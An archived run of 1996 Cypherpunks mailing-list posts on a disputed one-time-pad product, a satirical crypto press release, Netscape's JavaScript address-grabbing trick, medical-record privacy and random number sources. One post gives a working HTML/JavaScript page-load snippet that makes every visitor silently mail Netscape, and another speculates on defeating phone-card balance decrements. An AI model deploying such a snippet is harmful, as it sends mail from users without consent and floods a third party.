	id AA07898; Tue, 20 Feb 96 15:03:05 IST
Received: from toad.com by relay3.UU.NET with SMTP 
	id QQadse09618; Tue, 20 Feb 1996 04:11:46 -0500 (EST)
Received: by toad.com id AA25259; Tue, 20 Feb 96 00:51:53 PST
Received: from cs.umass.edu (freya.cs.umass.edu) by toad.com id AA25253; Tue, 20 Feb 96 00:51:48 PST
Received: from thor.cs.umass.edu by cs.umass.edu (5.65/Ultrix3.0-C)
	id AA22177; Tue, 20 Feb 1996 03:51:45 -0500
Received: (from lmccarth@localhost) by thor.cs.umass.edu (8.6.12/8.6.9) id DAA02057; Tue, 20 Feb 1996 03:51:44 -0500
From: lmccarth@cs.umass.edu
Message-Id: <199602200851.DAA02057@thor.cs.umass.edu>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Date: Tue, 20 Feb 1996 03:51:44 -0500 (EST)
Cc: ipgsales@cyberstation.net (IPG Sales)
Reply-To: cypherpunks@toad.com (Cypherpunks Mailing List)
In-Reply-To: <Pine.BSD/.3.91.960219132531.301A-100000@citrine.cyberstation.net> from "IPG Sales" at Feb 19, 96 02:51:58 pm
X-Mailer: ELM [version 2.4 PL25]
Mime-Version: 1.0
Content-Length: 3356
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks@toad.com
Precedence: bulk

I wrote:
# Gee, why are we all so worried about key management ?  It's just a load and
# go installation at each of the user sites !  ;)

("That was sarcasm, son")

IPG Sales writes:
> That is precisely why PCX Nvelopes is such an extraordinary system. 
> That is the beauty of PCX Nvelopes, it lifts that  burden from the 
> user, eliminates it entirely. You may have worried about key 
> management, but with our system, you will not have to do so in the 
> future. The system itself, manages all the OTPs, you do not have to do 
> anything but use the system. Key management is the problem with all existing 
> systems, but it is no problem at all with the PCX Nvelopes system, 

What protects each user's one time pads ("PCX Nvelopes", or whatever) ?  

Are they protected by an eight-character Unix account password ?  (This would 
be harder for implementations on traditionally single-user platforms like the
Macintosh and most of the Microsoft OSes, presumably.) 

Are they protected by a policy that says all users must lock away their IPG
disks or CDs when not in use ?  

Also, how are they protected from the people who generate the one-time pads
at IPG (and their friends and families) ? 

> as you 
> would see if you looked at the system, instead, of talking about something 
> when you have no idea at all of what it is about. 

As I said earlier, I read all your material and still had almost no idea
at all about what it is. If you don't tell people about the system, it's
extremely hard for them to do more than speculate.

> The first set of keys 
> must be sent by a secure source, US mail, FED EX, or whatever, but
> thereafter, all updates can be accomodated over Internet. 

Keys ?  Wait a minute, #2 of the "Dozen Reasons why PCX Nvelopes is
absolutely the finest Communication Security and Privacy system available",
according to http://www.netprivacy.com/ipg/dozbest.html, is:

"2. No Messy, Intrusive Passwords/Encryption Keys to get in your way and
worry about, forget about those troublemakers"

[...]
> all hardware generation of OTP's are irregular, otherwise they are not 
> random. 

I'm not sure what you mean by "irregular" in this context.

> Thus at times, a hardware source, such as ADC LOB system, can generate 
> nonrandom data, unless this is checked, it can destroyed the integrity of 
> your system. 

This doesn't quite jibe with my understanding of the typical use of a hardware
RNG. From what I have read, one starts with an unpredictable bit source with
some known bias, so that each original bit has somewhat less than one bit of
real entropy. The bias is "corrected" by combining the original bits to get
fewer bits with enough real entropy, and then repeating the process enough to
get enough final bits of real entropy. 

Could you explain what the acronyms "ADC" and "LOB" mean here ?  I
just tried a web search for the two together, and all I got was a page of
UFO acronyms, and some astronomical acronyms (LOB = Lick Observatory 
Bulletin). Schneier discusses hardware RNG at length in Applied Cryptography,
but he doesn't mention either acronym. I might guess that LOB = Low Order
Bits.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Wed, 21 Feb 1996 13:59:38 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE: New Crypto Product!
Message-ID: <Pine.3.89.9602201458.A32281-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


CompuScam, Inc., an unwholly-owned invention of InventiData, is pleased to
announce its latest offering in the growingly lucrative Internet Security
market.  Called "Secure Users Everywhere", SUE is "guaranteed privacy
protection for citizen-units everywhere," according to Ed Carp, Chief
Scientist, Chief Executive Officer, and Chief Everything Else for
CompuScam.  In today's press release, Carp said that "SUE is destined to
become the dominant market leader in a field full of inferior products." 

SUE is designed to work in any environment, and provides "Fort Knox" 
security for Internet users who wish to transact business over the "net". 
"Up until now, the Internet has been totally exposed, totally wide open to
every 12-year-old wannabe cracker with a cheap PC and a modem," said Carp,
"but with SUE, all that has changed overnight.  Now SUE users can safely
and securely exchange the most sensitive of documents, including credit
card and checking account numbers, SSN, employee information, credit
reports, gold bars - virtually anything that is of value can now be safely
transported across the Internet." 

No details were immediately available on the technical foundations of SUE,
but Carp indicated that this is to provide enhanced security for its
customers, adding that "you wouldn't want everyone to see your data, would
you?  Then why would you want everyone to know about how this software
works?"  According to CompuScam, SUE is composed of a small software "TSR"
that is loaded into memory when a computer is first powered up, and a
proprietary hardware device, known as a CUD ("compulsive exteriorization
device") that provides "total security" for the software.  Carp indicated
that the software TSR is "completely ITAR/RNG/SHA/RC4/BBS/RSA/MD5
compliant, and meets all government standards for the very highest levels
of cryptographic software, including FIPS-180, SESAME, and STU-III."  The
hardware device is reportedly PRNG/RNG compliant.

Additionally, the SUE product is reportedly backwards-compatible with most
other manufacturer's "inferior" cryptographic products, including products
from Digital Pathworks, AT&T, VeriSign, IBM, and others.  Asked whether or
not SUE is compatible with electronic cash offerings from First Virtual
and others, Carp said, "Our total solution is so comprehensive, we're
fixed problems that even the National Security Agency hasn't thought of
yet.  We've also totally addressed the major problems that First Virtual
brought to light last month in their press release," adding that no other
cryptographic software maker had even responded to First Virtual's
announcement, "let alone done anything about it.  We are acting now to
protect our customers and children on the Internet by providing total
coverage of the market." 

Carp denied rumors that the CompuScam was nothing but a mailbox located in
a Mailboxes Etc., branch office in Garland.  "I believe you will find that
a reporter obtained an early press release which contained an
typographical error in our suite number," adding that the company is
expecting to move soon to new offices near Sun Microsystems in Palo Alto,
adding that "the proximity to so many Silicon Valley companies will no
doubt enhance the value of our
stock^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^Hquality of our software." 

When asked about the timing of the release, noting that it was only a few
days before the company was scheduled to go public, Carp said, "this is an
absolutely wonderful opportunity for investors to get in on the ground
floor of this new technology" adding something about a new Porsche which
the reporters didn't quite catch. 

SUE is available for PCs running all versions of Microsoft Windows,
Windows 95, Windows NT and MS-DOS, as well as all UNIX and UNIX-like
platforms, and MVS.  The CUD hardware device is available in .357, .45,
.44 Magnum, and 9MM versions.  Pricing was not immediately available.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Wed, 21 Feb 1996 09:27:14 +0800
To: cypherpunks@toad.com
Subject: Re: JavaScript to grab email
Message-ID: <9602202009.AA09881@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> On Tue, 20 Feb 96 14:40:30 EST, Mike Rose <mrose@stsci.edu> said:

>Changing the email address known to netscape doesn't help.  Your email
>address is in the message sent, regardless of what netscape thinks
>your identity is.

Sorry for the imprecision here.  I was referring to Netscape 2.0 on
unix here.  Changing the email address known to netscape is
insufficient for non-root users on unix systems, because sendmail will
put your real address into the headers.

The auto-responder used by the posted example page apparently isn't
sophisticated enough to extract the real address, but the address is
still in the headers for someone to extract.

For those who haven't read the script, the technique used is as
follows.  A java script sends a mail message to the author of the
script.  The identity of the sender is in the mail headers.  The
script does not look at netscape variables or otherwise get the
information from netscape or the environment.

The major point is that setting a bogus email address in netscape will
not necessarily prevent your email address from being captured in this
manner.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 21 Feb 1996 11:47:09 +0800
To: cypherpunks@toad.com
Subject: Public Access Obsolete.  Capitalism offers free email
Message-ID: <2.2.32.19960220201325.0070e5c8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


The NYT's Cybertimes reports 
(http://www.nytimes.com/library/cyber/week/0219email.html)

that two companies are preparing to offer free email to customers who agree
to be barraged by ads.  Juno and Freemark will soon offer free email to all
(Americans).

http://www.freemark.com/freemark.html

http://www.juno.com/

And since you can do (almost) anything with email that you can do with the
rest of the net (just more slowly and less conviniently) I guess we don't
have to worry about government-provided public access any more.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Wed, 21 Feb 1996 12:46:27 +0800
To: markm@voicenet.com (Mark M.)
Subject: Re: JavaScript to grab email
In-Reply-To: <Pine.LNX.3.91.960220141458.485A-100000@gak>
Message-ID: <199602202014.PAA01389@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. writes:

> On Tue, 20 Feb 1996, Mike Rose wrote:
> 
> > >Probably there will soon be thousands of pages which include this code,
> > >and people using Netscape 2.0 will be spammed with commercial messages.
> > >So just put some false e-mail address in your Netscape browser to disable
> > >this feature.
> >
> > Changing the email address known to netscape doesn't help.  Your email
> > address is in the message sent, regardless of what netscape thinks
> > your identity is.
> 
> I'm not sure I understand what you are saying.  The Javascript program
> uses Netscape to send the e-mail.  The only way Netscape knows your actual
> e-mail address is if you tell Netscape what it is.  The comments on the
> page tell you that deleting your e-mail address from Netscape's config, or
> supplying it with a false one, prevents the script from working.  I visited
> the page using a fake e-mail address, and have yet to be sent a confirmation
> e-mail.

On my system (Linux), the "Sender: " header contains my address no matter
what I set my address too.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 21 Feb 1996 12:55:34 +0800
To: juggy@cerc.wvu.edu
Subject: Patient medical files on Net
Message-ID: <9601208248.AA824855630@cc1.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     WSJ - 2/20/96, page B1 
     
     "Click! Doctor to Post Patient Files on Net" by G. Bruce Knecht
     
     "An audacious experiment ...
     [snip]
     "Deep in the heart of Appalachian coal country, a doctor is about to 
     put his patients' records on the World Wide Web.  The Doctor, Bruce 
     Merkin, works at a community health clinic in Wayne, W. Va."
     [snip]
     "Dr. Merkin and Vasudevan Jagan-nathaniel, a West Virginia University 
     professor who is responsible for developing the software for the 
     system, say they have yet to decide how secure the system should be.  
     At one extreme, they could encrypt the information, offering the 
     highest possible degree of protection.  But encryption is expensive 
     and time consuming and thus could hinder the goals of cutting costs 
     and rapidly transmitting information."
     [snip]
     
     
     Cypherpunks:
     
     The WSJ report seems to indicate that the system is to be deployed 
     without any encryption safeguards.
     
     After talking by phone to Lee Oxley (oxley@vhs.wvu.edu) at Valley 
     Health in Wayne, WV, I got clarifications of what was in the WSJ 
     story.  The present pilot system is an intranet system with dedicated 
     frame relay links and does use encryption.  Eventually they may deploy 
     a system that would be internet based.  They are considering how much 
     protection to put into the system.  The reference in the article about 
     encryption costs was intended to be about CPU cycles not dollars. 
     Vasudevan Jagan-nathaniel's email address is juggy@cerc.wvu.edu
     
     Some obvious proposals would be to use something like SSL to do server 
     to workstation encryption.  I don't know what issues may exist such as 
     the effort to install SSL, key management, and processing delays due 
     to session keys and traffic encryption.  In addition, how could an 
     on-call doctor access patient records through an ISP and maintain 
     patient privacy.  An obvious issue (which I know have been discussed 
     on this list) has to do with the trade-off between key size and 
     privacy.
     
     Any other thoughts?
     
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mailer-Daemon@wipinfo.soft.net (Mail Delivery Subsystem)
Date: Tue, 20 Feb 1996 18:30:38 +0800
To: cypherpunks@toad.com
Subject: Returned mail: User unknown
Message-ID: <9602201012.AB09634@s.wipinfo.soft.net>
MIME-Version: 1.0
Content-Type: text/plain


   ----- Transcript of session follows -----
550 rajr... User unknown

   ----- Unsent message follows -----
Return-Path: <cypherpunks@toad.com>
Received: by s.wipinfo.soft.net (4.1/SMI-4.1)
	id AA09632; Tue, 20 Feb 96 15:42:56 IST
Received: from toad.com by relay3.UU.NET with SMTP 
	id QQadsh11578; Tue, 20 Feb 1996 04:51:09 -0500 (EST)
Received: by toad.com id AA25879; Tue, 20 Feb 96 01:43:53 PST
Received: from cs.umass.edu (freya.cs.umass.edu) by toad.com id AA25873; Tue, 20 Feb 96 01:43:48 PST
Received: from thor.cs.umass.edu by cs.umass.edu (5.65/Ultrix3.0-C)
	id AA22591; Tue, 20 Feb 1996 04:43:46 -0500
Received: (from lmccarth@localhost) by thor.cs.umass.edu (8.6.12/8.6.9) id EAA06099 for cypherpunks@toad.com; Tue, 20 Feb 1996 04:43:46 -0500
From: lmccarth@cs.umass.edu
Message-Id: <199602200943.EAA06099@thor.cs.umass.edu>
Subject: Re: Remailers not heard from; info?
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Date: Tue, 20 Feb 1996 04:43:45 -0500 (EST)
Reply-To: cypherpunks@toad.com (Cypherpunks Mailing List)
In-Reply-To: <2.2.32.19960219191757.006d763c@mail.aracnet.com> from "Bruce Baugh" at Feb 19, 96 11:17:57 am
X-Mailer: ELM [version 2.4 PL25]
Mime-Version: 1.0
Content-Length: 814
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks@toad.com
Precedence: bulk

Bruce Baugh writes:
> And as long as I'm asking questions :-), I see that some remailers
> (hfinney@shell.portal.com, hal@alumni.caltech.edu, homer@rahul.net) preserve
> subject lines while others do not. Is this a readily settable option? If so,
> I'd like to commend it to other remailer operators. If not, I'd be
> interested in getting some sense of how difficult a hack it is.

(Raph has authoritatively covered the space of deployed options already.)

Writing code to keep or drop particular headers is trivial. Getting everyone
who runs a remailer to deploy that code tends to be much harder.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kristian Sagi <sagi@physic.ut.ee>
Date: Wed, 21 Feb 1996 22:44:52 +0800
To: "'CypherPunks Mailinglist'" <cypherpunks@toad.com>
Subject: Telephone card tech. howto needed
Message-ID: <Pine.SOL.3.91.960220155151.11670A-100000@rabakivi>
MIME-Version: 1.0
Content-Type: text/plain


Hello guys !


Here is used such telephone cards like this one here ... Sorry , not
very good picture here ;-) ... In the middle of this plastic card

 /------------\    is a chip ... See this picture here :
 |            |
 |            |                             
 |            |      [1] [2] [3] [4]
 |            |       |   |   |   | 
 |            |       |   |   |   |
 |    ___     |        |  |   |  | 
 |   |   |    |         | |   | |
 |   |   |    |          [ Chip ] 
 |   -----    |           |     \
 |            |           |      \      
 \------------/       |   |   |   |   
                     [5] [6] [7] [8]

As you see this chip has 6 legs ... and telephone card has 8 connectors ... 
Only 6 are connected ... Has anyone ideas, how this card works ... i mean 
something like telephone card hardware tutorials or something ... I have some
ideas ... There is a something : when disconnect connector number [8] then 
The machine can't decrement the money value in card ... maybe he reads the value..
then he decrement the value in card , then reads "the new value" and if comparing
between the old and the new value are the same , then machine disconnects 
he's telephone line ... Ok ... this is only one point ... But i want to know
how this tech. works ... Anything is welcome ... please ... BTW Don't put
answers to here , please mail-to me : sagi@physic.ut.ee

Kristian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: asantos@retesa.es (Agustin Santos Mendez)
Date: Tue, 20 Feb 1996 23:23:45 +0800
To: nelson@santafe.edu>
Subject: Symantec Café
Message-ID: <9602201546.AA01028@sun2.retesa.es>
MIME-Version: 1.0
Content-Type: text/plain


La empresa Symantec ha sacado al mercado un entorno de programacion JAVA
para Windows´95/NT. Quien se apunta a evaluarlo?

El URL es :"http://www.symantec.com/lit/dev/javaindex.html"
 o bien   :"http://www.symantec.com/lit/dev/java.html"
Agustín Santos Méndez,            RETESA, S.A.
C/Orense 4, Planta 10. 28020 MADRID SPAIN.
Ph: +34.1.342.67.91                     Fax +34.1.597.28.77
E-mail: asantos@retesa.es   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 21 Feb 1996 13:53:16 +0800
To: IPG Sales <warlord@MIT.EDU>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <v02120d1aad50107a5006@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:22 2/20/96, IPG Sales wrote:

>If you are able to break the system, and everyone knows what we mean by
>break, then we will publicly admit that we are snake oil salesmen, and
>all the other things that Perry Metzger and others called us.

It is by no means clear to me what "breaking the system" means. One does
not have to be able to decipher a single message to prove a system to be
insecure. Moreover, cryptanalysis is economics: is it more expensive to get
the information by analyzing the crypto than it is to get it by other
means?

Do we have to show an exploitable flaw? Or we have to do the exploit? That
might be expensive. Who would judge the contest?

The alogrithm aside, IPG provides the intial OTP. Seems to me that IPG can
read the messages. End of story.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 21 Feb 1996 12:14:27 +0800
To: cypherpunks@toad.com
Subject: Chaotic physical systems as random number sources (fwd)
Message-ID: <199602202224.QAA18587@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 20 Feb 1996 14:47 EDT
> From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
> Subject: Chaotic physical systems as random number sources
> 
> 	I'm curious if anyone knows of any attempts to use a chaotic physical
> system (such as the famous double pendulum) as a source of random numbers.

I have used magnetic pendulums for this as well as chaotic dripping (both
with an old C64).

> 	One problem that I can see is that of strange attractors. While the
> path through each time would be different, they're still _close_ to each other,
> and a practical mechanical system might not be sensitive enough to pick up the
> differences.


Not necessarily. In both the magentic pendulum and chaotic pendulums this is
not a problem.


                                              Jim Choate
                                              ravage@ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Wed, 21 Feb 1996 00:11:47 +0800
To: cypherpunks@toad.com
Subject: JavaScript to grab email
Message-ID: <Pine.SOL.3.91.960220162211.12740A-100000@jaramillo.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



Another annoying feature in JavaScript and Netscape. Have a look at 
<http://www.popco.com/grabtest.html>

The page uses JavaScript to steal your e-mail address and sends a test 
e-mail message to the address it grabbed. It works with Netscape, which 
is probably only browser supporting JavaScript.

Probably there will soon be thousands of pages which include this code, 
and people using Netscape 2.0 will be spammed with commercial messages. 
So just put some false e-mail address in your Netscape browser to disable 
this feature.

The script was developed and announced by Glenn Fleishman, moderator of 
the Internet Marketing mailing list. Thanks for letting people know.

Jüri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 21 Feb 1996 13:33:26 +0800
To: cypherpunks@toad.com
Subject: Re: Public Access Obsolete.  Capitalism offers free email
Message-ID: <2.2.32.19960220213659.007009ec@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:13 PM 2/20/96 -0500, Duncan Frissell wrote:
>The NYT's Cybertimes reports 
>(http://www.nytimes.com/library/cyber/week/0219email.html)
>
>that two companies are preparing to offer free email to customers who agree
>to be barraged by ads.  Juno and Freemark will soon offer free email to all
>(Americans).

So if any of you nyms out there want an email presence, this might be a
possibility.  I wonder how they are verifying account setup info.  I will
investigate.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 21 Feb 1996 12:01:22 +0800
To: cypherpunks@toad.com
Subject: Need SSL firewall
Message-ID: <199602202203.RAA08526@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I need firewall software, preferably for free and running on an x86, that
allows me to place an SSL webserver behind the firewall.

Any pointers?

TIA,

- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSpFICoZzwIn1bdtAQF3YgGAnt2V+2sTgv7cHDu0k3HZ/664sFbYsu9V
4sWnsBNuJoMRVlG4RbxE/iERpu0nR6ZF
=kPCC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Wed, 21 Feb 1996 13:11:45 +0800
To: cypherpunks@toad.com
Subject: Re: JavaScript to grab email
In-Reply-To: <9602202009.AA09881@MARIAN.SOGS.STSCI.EDU>
Message-ID: <9602201704.ZM3263@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Feb 20,  3:09pm, Mike Rose wrote:
> For those who haven't read the script, the technique used is as
> follows.  A java script sends a mail message to the author of the
> script.  The identity of the sender is in the mail headers.  The
> script does not look at netscape variables or otherwise get the
> information from netscape or the environment.

Javascript is coming to annoy me more and more all the time. I can turn
off Java in Netscape, but I can't turn off Javascript, and I've already
encountered pages which use Javascript to animate status bars and so on.
My web browser should *not* be generating 90% of my usage, or if it is,
there should be a way of turning it off.

So, here's a proposal for those who (a) run high-traffic sites and (b)
are similarly annoyed with the Netscape plan.

Insert the following at the top of your top-level page.
<BODY onLoad="document.mailme.submit()">
<!-- First found at http://www.popco.com/grabtest.html -->
<form method=post name="mailme"
action="mailto:support@netscape.com?subject=javascript breaks privacy
protections">
<h3>Viewing this page has automatically sent a short piece of protest
e-mail to Netscape.</h3>
<input type=hidden name="Please let users turn " value="JAVASCRIPT OFF NOW!">
</form>
[the rest of your page here]
...
</BODY></HTML>

They *might* get the point.

<excuse>
It's *not* spamming them! Folks'll only--at most--send them about fifteen
messages a day!
</excuse>

They can use it to replace cookies, if they ever get rid of cookies.
["Alright, Jim, we've had to reboot the mail server fifteen times today,
which suggests that there's about fourteen thousand more users than
yesterday... Pity they can't talk to us, eh?"]

<malicious grin>
frodo =)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSpFUx1gtCYLvIJ1AQFxqgP9FT90ol1fakS2Zy2TN8eqMpsad0/UjSKZ
anEXYUUMzhV2Pr+RudCydygFa5HxiGMiHdjmLaO0cONsAmTD/MY2OrwigDfpk/DA
0SuqMgPhFt/UyGkatu0ZDLkpjUFqY0e6AD81mYe5eVBxarnfUtuZXEM7Slu/K4yF
ij67tiCQbh0=
=nNwZ
-----END PGP SIGNATURE-----

-- 
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: asantos@retesa.es (Agustin Santos Mendez)
Date: Wed, 21 Feb 1996 00:51:27 +0800
To: nelson@santafe.edu>
Subject: Conexion a control
Message-ID: <9602201657.AA01164@sun2.retesa.es>
MIME-Version: 1.0
Content-Type: text/plain


Por favor, no useis el modem hasta que no pongamos en marcha
el sistema de retorno de llamadas y nos aseguremos que estan 
las medidas de seguridad correctas.



>Return-Path: <jfla>
>Received: by sun2.retesa.es (5.x/SMI-SVR4)
>	id AA01057; Tue, 20 Feb 1996 15:58:35 GMT
>Date: Tue, 20 Feb 1996 15:58:35 GMT
>From: jfla (Jose Fernando Luis Alarcon)
>Message-Id: <9602201558.AA01057@sun2.retesa.es>
>To: gruporetesa
>Subject: Conexion a control
>Content-Type: text
>
>Hola a todos:
>	Teneis a vuestra disposicion el acceso a control por modem , la linea
>tendra el numero 3426751 , entrareis como terminal remoto .., la conexion ppp
>a control todavia no esta disponible.., pero lo estara en poco tiempo.
>	Un saludo,
>                                                            _
>                                                            /____/______
>                                                         (_/--  /__  /-\
>
Agustín Santos Méndez,            RETESA, S.A.
C/Orense 4, Planta 10. 28020 MADRID SPAIN.
Ph: +34.1.342.67.91                     Fax +34.1.597.28.77
E-mail: asantos@retesa.es   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Wed, 21 Feb 1996 16:00:11 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602200306.WAA11013@toxicwaste.media.mit.edu>
Message-ID: <Pine.BSD/.3.91.960220140515.9829M-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Derek - 

As stated previously, we accept the challenge that you make - 
However, we do believe that it should be a two way street -

If you are able to break the system, and everyone knows what we mean by 
break, then we will publicly admit that we are snake oil salesmen, and 
all the other things that Perry Metzger and others called us. We will go 
out of business, and tuck our tail and run. We will inform all major 
publications, WIRED, PC WEEK, PC  Magazine, PC World, Infoworld and the 
like that our mundane system was cracked by the cypherpunks. 

Furthermore: 
you, they,  will be free, to publish any material, any and all 
materials, will become the property of Cypherpunks if they break 
the system, inculding all of our source code - everything and they may do 
with it as they see fit.

On the other hand:

If the cypherpunks fail to break the system, they 
will  acknowledge that, not that it is unbreakable, but that they 
tried to break the system and were unable to do so, Furthermore, 
they will so notify all the major publications, and news sources that 
they tried break the system and failed - not that it is unbreakable 
but simply that they could not break it. Further, that all materials 
supplied to Cypherpunks will be returned to us, and will not be 
published without our explicit written permission, unless the 
Cypherpunks later break the system. 

Further:

That if you have not broken the system by August 1, 1996 the 
expiration date of the demo system to be provided to you, then we are
free to advertise that Cypherpunks have been trying to break our system and 
have been unable to so to that date, Further the cypherpunks will publicly 
acknowledge same as indicated previously. You can still try to break 
the system and publish the results, and obtain all of our souce code, 
materials and whatsoever when you do. However, you must do so with a 
purchased system and not a free demo system.

You can have infinity to try to break the system, but you cannot have 
that long to publicly admit that you have been unable to break it to 
date. I believe 5+ months is long enough to prove how easy it is to 
break, don't you.

Further:

If Cypherpunks are unable to break the system, then those who 
participated in the attempt will upbrade those cypherpunks, I at this 
stage prefer to call them cyphermouths, who have leaped before they 
looked, from a list supplied by us, based on received e-mail, in effect 
tell them to find out what they are talking about -before they start 
spouting off. 

Accordingly: 

We will not publish the algorithms on an Internet URL, for reasons 
that you, yourself, will soon come to understand. But we will provide it to a 
a very large selected set, you or your designee can do the selection, so 
long as all thosee selection are within the United States, of 
cypherpunks as follows:

 1. We will provide a 12 user integrated demo system, each outfitted with 
    240 Nvelopes, and Nvelopeners, read OTPs. These will not be the 
    5600 bit systems, discusssed in the many e-mail messages that have 
    been flowing back and forth, but will be our new 12288 bit systems, 
    which we have been working on since yesterday, since everyone seemed 
    to focus in on the 5600 bit OTPs - the algorithms themselves do not 
    change, only parametric values, but it will take a couple of days to 
    double check everything. 

    These are in effect single user systems, but for your purposes, 
    you may treat them as a site system. You may distribute them to 
    any twelve sites in the United States - You may not knowingly 
    deliver then into the hands of citizens of a country other than 
    the United States, not even Canadians. Nor may you make copies of 
    them and send them to anyone other than the 12 selected sites. Each 
    of the sites may of course communicate back and forth using the 
    system - be sure and don't include anything private because it is 
    so easy to break.  

    At each site, an unlimited number of people may work on cracking the 
    system, without limitation, but they must agree to the terms 
    set out herein in this offer.  Such participants may travel to a site 
    and work on it, but all work must be done at a site, not off 
    premises, at home or whatever -  the site may be operated 168 hours
    a week if desired, but no offsite work. 

   After the 20 User pair Nvelopes are exhausted, the DEMO system will be 
   set to recycle through the Nvelopes/Nvelopeners automatically,  this 
   means, as you might expect, that there is a finite chance, very 
   remote but possible, that you may get one or more exact OTP repeats  
   which means that you will be able to XOR out the OTP used, not the 
   orginal but the one actually used - that doers not count as breaking 
   the system, because it exists only as a convenience to continue 
   testing the system without interruption. For production systems, this 
   does not happen, cannot happen, unless you bugger your own, or allow 
   someone else to,system.     

   Also both performance and interface critisms are off limits during the 
   five months, unless you break the system of course - by then you may 
   crtique the performance, if you do it under lab conditions - a 
   defragmented disk with at least 10 times data free, ie. compare 
   apples to apples, not apples to oranges. We have been focusing on the 
   OTP aspects of the system, to the detriment of performance and 
   interface. For a first release though, we believe you will find them 
   acceptable - we will have a full windows 95 interface and 
   increased performance, hopefully by the time you break the 
   system, within the next few months. 

2. We will also supply 12 complete sets of the algorithms used, and 
   orally clarify any questions or ambiguities that may arise. However, 
   we will not submit to being unundated by a barrage of repetitious 
   questions - no more than three cypherpunks may be appointed as 
   questioners of IPG sales, and we are to be notified in writing,
   of who those appointees are. Inquiries from others will be directed to 
   one those three.

   The algorithms must be worked on at sight, other than some innoculous 
   trail and error processes and procedures which may be worked on at 
   home - no publication of same until you break the system.


